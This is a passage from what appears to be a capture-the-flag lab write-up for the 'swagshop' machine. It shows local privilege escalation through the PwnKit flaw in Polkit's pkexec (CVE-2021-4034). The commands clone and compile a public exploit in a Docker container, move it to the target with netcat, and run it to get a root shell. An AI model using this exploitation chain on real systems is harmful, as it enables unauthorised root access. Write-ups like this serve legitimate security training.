CVE-2021-4034
PEAS has discovered that the target system is vulnerable to CVE-2021-4034
The vulnerable program is a part of Polkit, which manages process privileges. Polkit’s pkexec allows for non-privileged processes to communicate with privileged ones, as well as instrumenting legitimate and authorized uses of privilege escalation similar to sudo.
A memory corruption flaw exists when no argument is passed to the function. By manipulating environment variables, an attacker can trick pkexec to load and execute arbitrary code with superuser privileges.
exploit pwnkit:
I Found an exploit online
I will download this to Kali
www-data@swagshop:/$ gcc
The program 'gcc' is currently not installed. To run 'gcc' please ask your administrator to install the package 'gcc'Since the target system doesn’t have a compiler installed, I would have to compile the exploit remotely
Docker Exploit Development
┌──(kali㉿kali)-[~/…/htb/labs/swagshop/kernelbuster]
└─$ docker run -it --entrypoint "/bin/bash" --name ubuntu_16.04 ubuntu:16.04Starting a Ubuntu 16.04 in a Docker container.
root@519c3688ac4c:/# ldd --version
ldd (Ubuntu GLIBC 2.23-0ubuntu11.3) 2.23
Copyright (C) 2016 Free Software Foundation, Inc.
This is free software; see the source for copying conditions. There is NO
warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
Written by Roland McGrath and Ulrich Drepper.glibc version confirmation
root@519c3688ac4c:/# apt update -y ; apt install net-tools netcat nano gcc gcc-multilib make git -yInstalling the necessary tools
root@519c3688ac4c:~# git clone https://github.com/berdav/CVE-2021-4034.git ; cd CVE-2021-4034
Cloning into 'CVE-2021-4034'...
remote: Enumerating objects: 92, done.
remote: Counting objects: 100% (36/36), done.
remote: Compressing objects: 100% (17/17), done.
remote: Total 92 (delta 24), reused 19 (delta 19), pack-reused 56
unpacking objects: 100% (92/92), done.
Checking connectivity... done.Downloading the exploit package
root@519c3688ac4c:~/CVE-2021-4034# make
cc -Wall --shared -fPIC -o pwnkit.so pwnkit.c
cc -Wall cve-2021-4034.c -o cve-2021-4034
echo "module UTF-8// PWNKIT// pwnkit 1" > gconv-modules
mkdir -p GCONV_PATH=.
cp -f /bin/true gconv_path=./pwnkit.so:.Compile
root@519c3688ac4c:~/CVE-2021-4034# cd .. ; tar -czf CVE-2021-4034.tar.gz CVE-2021-4034Archiving the exploit package for delivery
root@519c3688ac4c:~# nc 10.10.10.140 2222 < CVE-2021-4034.tar.gz
www-data@swagshop:/dev/shm$ nc nc -nlvp 2222 > CVE-2021-4034.tar.gz
Listening on [0.0.0.0] (family 0, port 2222)
Connection from [10.10.14.11] port 2222 [tcp/*] accepted (family 2, sport 32832)Delivery complete
Exploitation
www-data@swagshop:/dev/shm$ tar -xf CVE-2021-4034.tar.gz ; cd CVE-2021-4034
www-data@swagshop:/dev/shm/CVE-2021-4034$ ./cve-2021-4034
# whoami
whoami
root
# hostname
hostname
swagshop
# ifconfig
ifconfig
ens160 Link encap:Ethernet HWaddr 00:50:56:b9:49:f0
inet addr:10.10.10.140 Bcast:10.10.10.255 Mask:255.255.255.0
inet6 addr: dead:beef::250:56ff:feb9:49f0/64 Scope:Global
inet6 addr: fe80::250:56ff:feb9:49f0/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:4859 errors:0 dropped:0 overruns:0 frame:0
TX packets:4126 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:4346555 (4.3 MB) TX bytes:1117942 (1.1 MB)
lo Link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
inet6 addr: ::1/128 Scope:Host
UP LOOPBACK RUNNING MTU:65536 Metric:1
RX packets:260 errors:0 dropped:0 overruns:0 frame:0
TX packets:260 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1
RX bytes:40176 (40.1 KB) TX bytes:40176 (40.1 KB)System Level Compromise